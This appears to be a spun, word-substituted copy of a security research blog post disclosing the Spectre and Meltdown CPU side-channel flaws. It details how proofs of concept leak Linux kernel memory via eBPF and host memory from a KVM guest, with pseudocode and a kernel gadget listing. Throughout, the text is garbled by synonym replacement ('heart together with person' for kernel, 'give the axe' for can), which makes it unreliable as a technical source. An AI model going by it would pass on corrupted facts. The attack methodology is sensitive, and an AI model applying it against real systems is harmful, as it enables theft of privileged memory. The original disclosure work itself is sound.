Reading Privileged Retention Alongside A Side-Channel

Posted past times Jann Horn,

We withdraw hold discovered that CPU information cache timing tin give the axe live abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual retentiveness read vulnerabilities across local safety boundaries inwards diverse contexts.

Variants of this number are known to touching many modern processors, including certainly processors past times Intel, AMD together with ARM. For a few Intel together with AMD CPU models, nosotros withdraw hold exploits that piece of work against existent software. We reported this number to Intel, AMD together with ARM on 2017-06-01 [1].

So far, at that spot are 3 known variants of the issue:

Variant 1: bounds cheque bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue information cache charge (CVE-2017-5754)

Before the issues described hither were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher together with Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 together with 2)
Meltdown (variant 3)

During the course of study of our research, nosotros developed the next proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 inwards userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU together with an ARM Cortex A57 [2]. This PoC exclusively tests for the powerfulness to read information within mis-speculated execution within the same process, without crossing whatever privilege boundaries.
A PoC for variant 1 that, when running amongst normal user privileges nether a modern Linux heart together with person amongst a distro-standard config, tin give the axe perform arbitrary reads inwards a 4GiB make [3] inwards heart together with person virtual retentiveness on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also plant on the AMD PRO CPU. On the Intel Haswell Xeon CPU, heart together with person virtual retentiveness tin give the axe live read at a charge per unit of measurement of precisely about 2000 bytes per 2nd after precisely about 4 seconds of startup time. [4]
A PoC for variant 2 that, when running amongst root privileges within a KVM invitee created using virt-manager on the Intel Haswell Xeon CPU, amongst a specific (now outdated) version of Debian's distro kernel [5] running on the host, tin give the axe read host heart together with person retentiveness at a charge per unit of measurement of precisely about 1500 bytes/second, amongst room for optimization. Before the laid on tin give the axe live performed, some initialization has to live performed that takes roughly betwixt 10 together with xxx minutes for a machine amongst 64GiB of RAM; the needed fourth dimension should scale roughly linearly amongst the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should live much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running amongst normal user privileges, tin give the axe read heart together with person retentiveness on the Intel Haswell Xeon CPU nether some precondition. We believe that this precondition is that the targeted heart together with person retentiveness is acquaint inwards the L1D cache.

For interesting resources precisely about this topic, aspect downward into the "Literature" section.

A alert regarding explanations nigh processor internals inwards this blogpost: This blogpost contains a lot of speculation nigh hardware internals based on observed behavior, which mightiness non necessarily tally to what processors are truly doing.

We withdraw hold some ideas on possible mitigations together with provided some of those ideas to the processor vendors; however, nosotros believe that the processor vendors are inwards a much improve seat than nosotros are to blueprint together with evaluate mitigations, together with nosotros aspect them to live the source of authoritative guidance.

The PoC code together with the writeups that nosotros sent to the CPU vendors are available here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" inwards the residue of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" inwards the residue of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" inwards the residue of this document)
An ARM Cortex A57 core of a Google Nexus 5x telephone [6] (called "ARM Cortex A57" inwards the residue of this document)

Glossary

retire: An educational activity retires when its results, e.g. register writes together with retentiveness writes, are committed together with made visible to the residue of the system. Instructions tin give the axe live executed out of order, but must ever retire inwards order.

logical processor core: H5N1 logical processor core is what the operating organisation sees every bit a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" information is information that is exclusively acquaint inwards primary memory, non inwards whatever of the cache levels of the CPU. Loading uncached information volition typically accept over 100 cycles of CPU time.

speculative execution: H5N1 processor tin give the axe execute past times a branch without knowing whether it volition live taken or where its target is, thence executing instructions earlier it is known whether they should live executed. If this speculation turns out to withdraw hold been incorrect, the CPU tin give the axe discard the resulting nation without architectural effects together with larn out along execution on the right execution path. Instructions exercise non retire earlier it is known that they are on the right execution path.

mis-speculation window: The fourth dimension window during which the CPU speculatively executes the wrong code together with has non yet detected that mis-speculation has occurred.

Variant 1: Bounds cheque bypass

This department explains the mutual theory behind all 3 variants together with the theory behind our PoC for variant 1 that, when running inwards userspace nether a Debian distro kernel, tin give the axe perform arbitrary reads inwards a 4GiB part of heart together with person retentiveness inwards at to the lowest degree the next configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The nation of the eBPF JIT tin give the axe live toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the next regarding Sandy Bridge (and subsequently microarchitectural revisions) inwards department 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target together with enables the

processor to get down executing instructions long earlier the branch

true execution path is known.

In department 2.3.5.2 ("L1 DCache"):

Loads can:

[...]

Be carried out speculatively, earlier preceding branches are resolved.
Take cache misses out of guild together with inwards an overlapped manner.

Intel's Software Developer's Manual [7] states inwards Volume 3A, department 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, together with P6 solid unit of measurement processors"):

Implicit caching occurs when a retentiveness chemical factor is made potentially cacheable, although the chemical factor may never withdraw hold been accessed inwards the normal von Neumann sequence. Implicit caching occurs on the P6 together with to a greater extent than recent processor families due to aggressive prefetching, branch prediction, together with TLB missy handling. Implicit caching is an extension of the demeanor of existing Intel386, Intel486, together with Pentium processor systems, since software running on these processor families also has non been able to deterministically predict the demeanor of educational activity prefetch.

Consider the code sample below. If arr1->length is uncached, the processor tin give the axe speculatively charge information from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should non thing because the processor volition effectively whorl dorsum the execution nation when the branch has executed; none of the speculatively executed instructions volition retire (e.g. movement registers etc. to live affected).

struct array {

unsigned long length;

unsigned char data[];

};

struct array *arr1 = ...;

unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {

unsigned char value = arr1->data[untrusted_offset_from_caller];

...

}

However, inwards the next code sample, there's an issue. If arr1->length, arr2->data[0x200] together with arr2->data[0x300] are non cached, but all other accessed information is, together with the branch atmospheric condition are predicted every bit true, the processor tin give the axe exercise the next speculatively earlier arr1->length has been loaded together with the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a charge from a data-dependent offset inwards arr2->data, loading the corresponding cache business into the L1 cache

struct array {

unsigned long length;

unsigned char data[];

};

struct array *arr1 = ...; /* pocket-size array */

struct array *arr2 = ...; /* array of size 0x400 */

/* >0x400 (OUT OF BOUNDS!) */

unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {

unsigned char value = arr1->data[untrusted_offset_from_caller];

unsigned long index2 = ((value&1)*0x100)+0x200;

if (index2 < arr2->length) {

unsigned char value2 = arr2->data[index2];

}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache business containing arr2->data[index2] stays inwards the L1 cache. By measure the fourth dimension required to charge arr2->data[0x200] together with arr2->data[0x300], an aggressor tin give the axe so determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

To live able to truly exercise this demeanor for an attack, an aggressor needs to live able to movement the execution of such a vulnerable code pattern inwards the targeted context amongst an out-of-bounds index. For this, the vulnerable code pattern must either live acquaint inwards existing code, or at that spot must live an interpreter or JIT engine that tin give the axe live used to generate the vulnerable code pattern. So far, nosotros withdraw hold non truly identified whatever existing, exploitable instances of the vulnerable code pattern; the PoC for leaking heart together with person retentiveness using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the heart together with person together with accessible to normal users.

A shaver variant of this could live to instead exercise an out-of-bounds read to a role pointer to gain command of execution inwards the mis-speculated path. We did non investigate this variant further.

Attacking the kernel

This department describes inwards to a greater extent than special how variant 1 tin give the axe live used to leak Linux heart together with person retentiveness using the eBPF bytecode interpreter together with JIT engine. While at that spot are many interesting potential targets for variant 1 attacks, nosotros chose to laid on the Linux in-kernel eBPF JIT/interpreter because it provides to a greater extent than command to the aggressor than most other JITs.

The Linux heart together with person supports eBPF since version 3.18. Unprivileged userspace code tin give the axe render bytecode to the heart together with person that is verified past times the heart together with person together with then:

either interpreted past times an in-kernel bytecode interpreter
or translated to native machine code that also runs inwards heart together with person context using a JIT engine (which translates private bytecode instructions without performing whatever farther optimizations)

Execution of the bytecode tin give the axe live triggered past times attaching the eBPF bytecode to a socket every bit a filter together with so sending information through the other goal of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at to the lowest degree on the tested Intel processor, the laid on plant independent of that setting.

Unlike classic BPF, eBPF has information types similar information arrays together with role pointer arrays into which eBPF bytecode tin give the axe index. Therefore, it is possible to exercise the code pattern described to a higher house inwards the heart together with person using eBPF bytecode.

eBPF's information arrays are less efficient than its role pointer arrays, so the laid on volition exercise the latter where possible.

Both machines on which this was tested withdraw hold no SMAP, together with the PoC relies on that (but it shouldn't live a precondition inwards principle).

Additionally, at to the lowest degree on the Intel machine on which this was tested, bouncing modified cache lines betwixt cores is slow, evidently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on 1 physical CPU core causes the cache business containing the reference counter to live bounced over to that CPU core, making reads of the reference counter on all other CPU cores wearisome until the changed reference counter has been written dorsum to memory. Because the length together with the reference counter of an eBPF array are stored inwards the same cache line, this also way that changing the reference counter on 1 physical CPU core causes reads of the eBPF array's length to live wearisome on other physical CPU cores (intentional faux sharing).

The laid on uses 2 eBPF programs. The commencement 1 tail-calls through a page-aligned eBPF role pointer array prog_map at a configurable index. In simplified terms, this computer program is used to determine the address of prog_map past times guessing the offset from prog_map to a userspace address together with tail-calling through prog_map at the guessed offsets. To movement the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed inwards between. To increase the mis-speculation window, the cache business containing the length of prog_map is bounced to some other core. To essay whether an offset guess was successful, it tin give the axe live tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would live slow, the next optimization is used: 215 next userspace retentiveness mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, roofing a total surface area of 231 bytes. Each mapping maps the same physical pages, together with all mappings are acquaint inwards the pagetables.

This permits the laid on to live carried out inwards steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, exclusively 1 cache business each from the commencement 24 pages of user_mapping_area withdraw hold to live tested for cached memory. Because the L3 cache is physically indexed, whatever access to a virtual address mapping a physical page volition movement all other virtual addresses mapping the same physical page to larn out cached every bit well.

When this laid on finds a hit—a cached retentiveness location—the upper 33 bits of the heart together with person address are known (because they tin give the axe live derived from the address guess at which the hitting occurred), together with the depression xvi bits of the address are also known (from the offset within user_mapping_area at which the hitting was found). The remaining portion of the address of user_mapping_area is the middle.

The remaining bits inwards the middle tin give the axe live determined past times bisecting the remaining address space: Map 2 physical pages to next ranges of virtual addresses, each virtual address make the size of one-half of the remaining search space, so determine the remaining address bit-wise.

At this point, a 2nd eBPF computer program tin give the axe live used to truly leak data. In pseudocode, this computer program looks every bit follows:

uint64_t bitmask = <runtime-configurable>;

uint64_t bitshift_selector = <runtime-configurable>;

uint64_t prog_array_base_offset = <runtime-configurable>;

uint64_t secret_data_offset = <runtime-configurable>;

// index volition live bounds-checked past times the runtime,

// but the bounds cheque volition live bypassed speculatively

uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);

// select a unmarried bit, displace it to a specific position, together with add together the base of operations offset

uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;

bpf_tail_call(prog_map, progmap_index);

This computer program reads 8-byte-aligned 64-bit values from an eBPF information array "victim_map" at a runtime-configurable offset together with bitmasks together with bit-shifts the value so that 1 fleck is mapped to 1 of 2 values that are 27 bytes apart (sufficient to non solid ground inwards the same or next cache lines when used every bit an array index). Finally it adds a 64-bit offset, so uses the resulting value every bit an offset into prog_map for a tail call.

This computer program tin give the axe so live used to leak retentiveness past times repeatedly calling the eBPF computer program amongst an out-of-bounds offset into victim_map that specifies the information to leak together with an out-of-bounds offset into prog_map that causes prog_map + offset to dot to a userspace retentiveness area. Misleading the branch prediction together with bouncing the cache lines plant the same way every bit for the commencement eBPF program, except that now, the cache business belongings the length of victim_map must also live bounced to some other core.

Variant 2: Branch target injection

This department describes the theory behind our PoC for variant 2 that, when running amongst root privileges within a KVM invitee created using virt-manager on the Intel Haswell Xeon CPU, amongst a specific version of Debian's distro heart together with person running on the host, tin give the axe read host heart together with person retentiveness at a charge per unit of measurement of precisely about 1500 bytes/second.

Basics

Prior inquiry (see the Literature department at the end) has shown that it is possible for code inwards separate safety contexts to influence each other's branch prediction. So far, this has exclusively been used to infer information nigh where code is located (in other words, to exercise interference from the victim to the attacker); however, the basic hypothesis of this laid on variant is that it tin give the axe also live used to redirect execution of code inwards the victim context (in other words, to exercise interference from the aggressor to the victim; the other way around).

The basic sentiment for the laid on is to target victim code that contains an indirect branch whose target address is loaded from retentiveness together with level the cache business containing the target address out to primary memory. Then, when the CPU reaches the indirect branch, it won't know the truthful destination of the jump, together with it won't live able to calculate the truthful destination until it has finished loading the cache business dorsum into the CPU, which takes a few hundred cycles. Therefore, at that spot is a fourth dimension window of typically over 100 cycles inwards which the CPU volition speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented past times Intel's processors withdraw hold already been published; however, getting this laid on to piece of work properly required meaning farther experimentation to determine additional details.

This department focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to withdraw hold multiple branch prediction mechanisms that piece of work real differently:

A generic branch predictor that tin give the axe exclusively shop 1 target per source address; used for all kinds of jumps, similar absolute jumps, relative jumps together with so on.
A specialized indirect telephone scream upwardly predictor that tin give the axe shop multiple targets per source address; used for indirect calls.
(There is also a specialized render predictor, according to Intel's optimization manual, but nosotros haven't analyzed that inwards special yet. If this predictor could live used to reliably dump out some of the telephone scream upwardly stack through which a VM was entered, that would live real interesting.)

Generic predictor

The generic branch predictor, every bit documented inwards prior research, exclusively uses the lower 31 bits of the address of the lastly byte of the source educational activity for its prediction. If, for example, a branch target buffer (BTB) entry exists for a saltation from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor volition also exercise it to predict a saltation from 0x4242.0004.1000. When the higher bits of the source address differ similar this, the higher bits of the predicted destination alter together amongst it—in this case, the predicted destination address volition live 0x4242.0004.5123—so evidently this predictor doesn't shop the full, absolute destination address.

Before the lower 31 bits of the source address are used to aspect upwardly a BTB entry, they are folded together using XOR. Specifically, the next bits are folded together:

bit A	bit B
0x40.0000	0x2000
0x80.0000	0x4000
0x100.0000	0x8000
0x200.0000	0x1.0000
0x400.0000	0x2.0000
0x800.0000	0x4.0000
0x2000.0000	0x10.0000
0x4000.0000	0x20.0000

In other words, if a source address is XORed amongst both numbers inwards a row of this table, the branch predictor volition non live able to distinguish the resulting address from the master copy source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 together with 0x180.0000, together with it tin give the axe also distinguish source addresses 0x100.0000 together with 0x180.8000, but it can't distinguish source addresses 0x100.0000 together with 0x140.2000 or source addresses 0x100.0000 together with 0x180.4000. In the following, this volition live referred to every bit aliased source addresses.

When an aliased source address is used, the branch predictor volition silent predict the same target every bit for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forwards together with backward saltation distances for different source addresses, the depression 32-bit one-half of the target address could live stored every bit an absolute 32-bit value amongst an additional fleck that specifies whether the saltation from source to target crosses a 232 boundary; if the saltation crosses such a boundary, fleck 31 of the source address determines whether the high one-half of the educational activity pointer should increase or decrement.

Indirect telephone scream upwardly predictor

The inputs of the BTB lookup for this machinery seem to be:

The depression 12 bits of the address of the source educational activity (we are non certainly whether it's the address of the commencement or the lastly byte) or a subset of them.
The branch history buffer state.

If the indirect telephone scream upwardly predictor can't resolve a branch, it is resolved past times the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls together with Jumps. These may either live predicted every bit having a monotonic target or every bit having targets that vary inwards accordance amongst recent computer program behavior."

The branch history buffer (BHB) stores information nigh the lastly 29 taken branches - basically a fingerprint of recent command menstruation - together with is used to let improve prediction of indirect calls that tin give the axe withdraw hold multiple targets.

The update role of the BHB plant every bit follows (in pseudocode; src is the address of the lastly byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {

*bhb_state <<= 2;

*bhb_state ^= (dst & 0x3f);

*bhb_state ^= (src & 0xc0) >> 6;

*bhb_state ^= (src & 0xc00) >> (10 - 2);

*bhb_state ^= (src & 0xc000) >> (14 - 4);

*bhb_state ^= (src & 0x30) << (6 - 4);

*bhb_state ^= (src & 0x300) << (8 - 8);

*bhb_state ^= (src & 0x3000) >> (12 - 10);

*bhb_state ^= (src & 0x30000) >> (16 - 12);

*bhb_state ^= (src & 0xc0000) >> (18 - 14);

}

Some of the bits of the BHB nation seem to live folded together farther using XOR when used for a BTB access, but the precise folding role hasn't been understood yet.

The BHB is interesting for 2 reasons. First, cognition nigh its approximate demeanor is required inwards guild to live able to accurately movement collisions inwards the indirect telephone scream upwardly predictor. But it also permits dumping out the BHB nation at whatever repeatable computer program nation at which the aggressor tin give the axe execute code - for example, when attacking a hypervisor, direct after a hypercall. The dumped BHB nation tin give the axe so live used to fingerprint the hypervisor or, if the aggressor has access to the hypervisor binary, to determine the depression 20 bits of the hypervisor charge address (in the instance of KVM: the depression 20 bits of the charge address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how nosotros reverse-engineered the internals of the Haswell branch predictor. Some of this is written downward from memory, since nosotros didn't hold a detailed tape of what nosotros were doing.

We initially attempted to perform BTB injections into the heart together with person using the generic predictor, using the cognition from prior inquiry that the generic predictor exclusively looks at the lower one-half of the source address together with that exclusively a partial target address is stored. This sort of worked - however, the injection success charge per unit of measurement was real low, below 1%. (This is the method nosotros used inwards our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace essay instance to live able to to a greater extent than easily essay branch predictor demeanor inwards different situations.

Based on the supposition that branch predictor nation is shared betwixt hyperthreads [10], nosotros wrote a computer program of which 2 instances are each pinned to 1 of the 2 logical processors running on a specific physical core, where 1 instance attempts to perform branch injections spell the other measures how oft branch injections are successful. Both instances were executed amongst ASLR disabled together with had the same code at the same addresses. The injecting procedure performed indirect calls to a role that accesses a (per-process) essay variable; the measure procedure performed indirect calls to a role that tests, based on timing, whether the per-process essay variable is cached, together with so evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the role pointer stored inwards retentiveness was flushed out to primary retentiveness using CLFLUSH to widen the speculation fourth dimension window. Additionally, because of the reference to "recent computer program behavior" inwards Intel's optimization manual, a bunch of conditional branches that are ever taken were inserted inwards front end of the indirect call.

In this test, the injection success charge per unit of measurement was to a higher house 99%, giving us a base of operations setup for futurity experiments.

We so tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays inwards the history buffer, a conditional branch that is exclusively taken inwards 1 of the 2 computer program instances was inserted inwards front end of the series of always-taken conditional jumps, so the number of always-taken conditional jumps (N) was varied. The final result was that for N=25, the processor was able to distinguish the branches (misprediction charge per unit of measurement nether 1%), but for N=26, it failed to exercise so (misprediction charge per unit of measurement over 99%).

Therefore, the branch history buffer had to live able to shop information nigh at to the lowest degree the lastly 26 branches.

The code inwards 1 of the 2 computer program instances was so moved precisely about inwards memory. This revealed that exclusively the lower 20 bits of the source together with target addresses withdraw hold an influence on the branch history buffer.

Testing amongst different types of branches inwards the 2 computer program instances revealed that static jumps, taken conditional jumps, calls together with returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the lastly byte of the source educational activity is the 1 that counts; IRETQ doesn't influence the history buffer nation (which is useful for testing because it permits creating computer program menstruation that is invisible to the history buffer).

Moving the lastly conditional branch earlier the indirect telephone scream upwardly precisely about inwards retentiveness multiple times revealed that the branch history buffer contents tin give the axe live used to distinguish many different locations of that lastly conditional branch instruction. This suggests that the history buffer doesn't shop a listing of pocket-size history values; instead, it seems to live a larger buffer inwards which history information is mixed together.

However, a history buffer needs to "forget" nigh past times branches after a certainly number of novel branches withdraw hold been taken inwards guild to live useful for branch prediction. Therefore, when novel information is mixed into the history buffer, this tin give the axe non movement information inwards bits that are already acquaint inwards the history buffer to propagate downwards - together with given that, upwards combination of information in all probability wouldn't live real useful either. Given that branch prediction also must live real fast, nosotros concluded that it is probable that the update role of the history buffer left-shifts the quondam history buffer, so XORs inwards the novel nation (see diagram).

If this supposition is correct, so the history buffer contains a lot of information nigh the most recent branches, but exclusively contains every bit many bits of information every bit are shifted per history buffer update nigh the lastly branch nigh which it contains whatever data. Therefore, nosotros tested whether flipping different bits inwards the source together with target addresses of a saltation followed past times 32 always-taken jumps amongst static source together with target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps inwards between, no fleck flips seemed to withdraw hold an influence, so nosotros decreased the number of static jumps until a divergence was observable. The final result amongst 28 always-taken jumps inwards betwixt was that bits 0x1 together with 0x2 of the target together with bits 0x40 together with 0x80 of the source had such an influence; but flipping both 0x1 inwards the target together with 0x40 inwards the source or 0x2 inwards the target together with 0x80 inwards the source did non permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits together with shows which information is stored inwards the to the lowest degree meaning bits of the history buffer. We so repeated this amongst decreased amounts of fixed jumps after the bit-flipped saltation to determine which information is stored inwards the remaining bits.

Reading host retentiveness from a KVM guest

Locating the host kernel

Our PoC locates the host heart together with person inwards several steps. The information that is determined together with necessary for the next steps of the laid on consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the diverse techniques an aggressor tin give the axe use. H5N1 simpler way would live to commencement determine the address of vmlinux, so bisect the addresses of kvm.ko together with kvm-intel.ko.

In the commencement step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer nation after invitee entry is dumped out. Then, for every possible value of bits 12..19 of the charge address of kvm-intel.ko, the expected lowest xvi bits of the history buffer are computed based on the charge address guess together with the known offsets of the lastly 8 branches earlier invitee entry, together with the results are compared against the lowest xvi bits of the leaked history buffer state.

The branch history buffer nation is leaked inwards steps of 2 bits past times measure misprediction rates of an indirect telephone scream upwardly amongst 2 targets. One way the indirect telephone scream upwardly is reached is from a vmcall educational activity followed past times a series of northward branches whose relevant source together with target address bits are all zeroes. The 2nd way the indirect telephone scream upwardly is reached is from a series of controlled branches inwards userspace that tin give the axe live used to write arbitrary values into the branch history buffer.

Misprediction rates are measured every bit inwards the department "Reverse-Engineering Branch Predictor Internals", using 1 telephone scream upwardly target that loads a cache business together with some other 1 that checks whether the same cache business has been loaded.

With N=29, mispredictions volition occur at a high charge per unit of measurement if the controlled branch history buffer value is null because all history buffer nation from the hypercall has been erased. With N=28, mispredictions volition occur if the controlled branch history buffer value is 1 of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - past times testing all iv possibilities, it tin give the axe live detected which 1 is right. Then, for decreasing values of N, the iv possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 tin give the axe live determined.

At this point, the depression 20 bits of kvm-intel.ko are known; the next stair is to roughly locate kvm.ko.

For this, the generic branch predictor is used, using information inserted into the BTB past times an indirect telephone scream upwardly from kvm.ko to kvm-intel.ko that happens on every hypercall; this way that the source address of the indirect telephone scream upwardly has to live leaked out of the BTB.

kvm.ko volition in all probability live located somewhere inwards the make from 0xffffffffc0000000 to 0xffffffffc4000000, amongst page alignment (0x1000). This way that the commencement iv entries inwards the tabular array inwards the department "Generic Predictor" apply; at that spot volition live 24-1=15 aliasing addresses for the right one. But that is also an advantage: It cuts downward the search infinite from 0x4000 to 0x4000/24=1024.

To discovery the right address for the source or 1 of its aliasing addresses, code that loads information through a specific register is placed at all possible telephone scream upwardly targets (the leaked depression 20 bits of kvm-intel.ko plus the in-module offset of the telephone scream upwardly target plus a multiple of 220) together with indirect calls are placed at all possible telephone scream upwardly sources. Then, alternatingly, hypercalls are performed together with indirect calls are performed through the different possible non-aliasing telephone scream upwardly sources, amongst randomized history buffer nation that prevents the specialized prediction from working. After this step, at that spot are 216 remaining possibilities for the charge address of kvm.ko.

Next, the charge address of vmlinux tin give the axe live determined inwards a similar way, using an indirect telephone scream upwardly from vmlinux to kvm.ko. Luckily, none of the bits which are randomized inwards the charge address of vmlinux are folded together, so dissimilar when locating kvm.ko, the final result volition direct live unique. vmlinux has an alignment of 2MiB together with a randomization make of 1GiB, so at that spot are silent exclusively 512 possible addresses.

Because (as far every bit nosotros know) a uncomplicated hypercall won't truly movement indirect calls from vmlinux to kvm.ko, nosotros instead exercise port I/O from the status register of an emulated series port, which is acquaint inwards the default configuration of a virtual machine created amongst virt-manager.

The exclusively remaining slice of information is which 1 of the xvi aliasing charge addresses of kvm.ko is truly correct. Because the source address of an indirect telephone scream upwardly to kvm.ko is known, this tin give the axe live solved using bisection: Place code at the diverse possible targets that, depending on which instance of the code is speculatively executed, loads 1 of 2 cache lines, together with mensurate which 1 of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does non withdraw hold access to hugepages.To discovery eviction sets for all L3 cache sets amongst a specific alignment relative to a 4KiB page boundary, the PoC commencement allocates 25600 pages of memory. Then, inwards a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction laid is contained inwards the subset is 1, reduces each subset downward to an eviction laid past times repeatedly accessing its cache lines together with testing whether the cache lines are ever cached (in which instance they're in all probability non portion of an eviction set) together with attempts to exercise the novel eviction laid to evict all remaining unsorted cache lines to determine whether they are inwards the same cache laid [12].

Locating the host-virtual address of a invitee page

Because this laid on uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of 1 invitee page. Alternative approaches such every bit PRIME+PROBE should piece of work without that requirement.

The basic sentiment for this stair of the laid on is to exercise a branch target injection laid on against the hypervisor to charge an attacker-controlled address together with essay whether that caused the guest-owned page to live loaded. For this, a gadget that only loads from the retentiveness location specified past times R8 tin give the axe live used - R8-R11 silent comprise guest-controlled values when the commencement indirect telephone scream upwardly after a invitee larn out is reached on this heart together with person build.

We expected that an aggressor would demand to either know which eviction laid has to live used at this dot or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed demeanor is truly the final result of L1D together with L2 evictions, which mightiness live sufficient to permit a few instructions worth of speculative execution.

The host heart together with person maps (nearly?) all physical retentiveness inwards the physmap area, including retentiveness assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), inwards an surface area of size 128PiB. Therefore, direct bruteforcing the host-virtual address of a invitee page would accept a long time. It is non necessarily impossible; every bit a ballpark estimate, it should live possible within a twenty-four hours or so, mayhap less, assuming 12000 successful injections per 2nd together with xxx invitee pages that are tested inwards parallel; but non every bit impressive every bit doing it inwards a few minutes.

To optimize this, the work tin give the axe live carve upwardly up: First, brute-force the physical address using a gadget that tin give the axe charge from physical addresses, so brute-force the base of operations address of the physmap region. Because the physical address tin give the axe usually live assumed to live far below 128PiB, it tin give the axe live brute-forced to a greater extent than efficiently, together with brute-forcing the base of operations address of the physmap part afterwards is also easier because so address guesses amongst 1GiB alignment tin give the axe live used.

To brute-force the physical address, the next gadget tin give the axe live used:

ffffffff810a9def: 4c 89 c0 mov rax,r8

ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d

ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]

ffffffff810a9dfc: 81

ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]

ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]

ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the surface area precisely about the heart together with person text department past times setting R9 appropriately, which inwards special permits loading page_offset_base, the start address of the physmap. Then, the value that was originally inwards R8 - the physical address guess minus 0xf8 - is added to the final result of the previous load, 0xfa is added to it, together with the final result is dereferenced.

Cache laid selection

To select the right L3 eviction set, the laid on from the next department is essentially executed amongst different eviction sets until it works.

Leaking data

At this point, it would ordinarily live necessary to locate gadgets inwards the host heart together with person code that tin give the axe live used to truly leak information past times reading from an attacker-controlled location, shifting together with masking the final result appropriately together with so using the final result of that every bit offset to an attacker-controlled address for a load. But piecing gadgets together together with figuring out which ones piece of work inwards a speculation context seems annoying. So instead, nosotros decided to exercise the eBPF interpreter, which is built into the host heart together with person - spell at that spot is no legitimate way to invoke it from within a VM, the presence of the code inwards the host kernel's text department is sufficient to larn inwards usable for the attack, precisely similar amongst ordinary ROP gadgets.

The eBPF interpreter entry dot has the next role signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The 2nd parameter is a pointer to an array of statically pre-verified eBPF instructions to live executed - which way that __bpf_prog_run() volition non perform whatever type checks or bounds checks. The commencement parameter is only stored every bit portion of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, amid other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored inwards emulated registers
bitwise operations (including fleck shifts) together with arithmetics operations

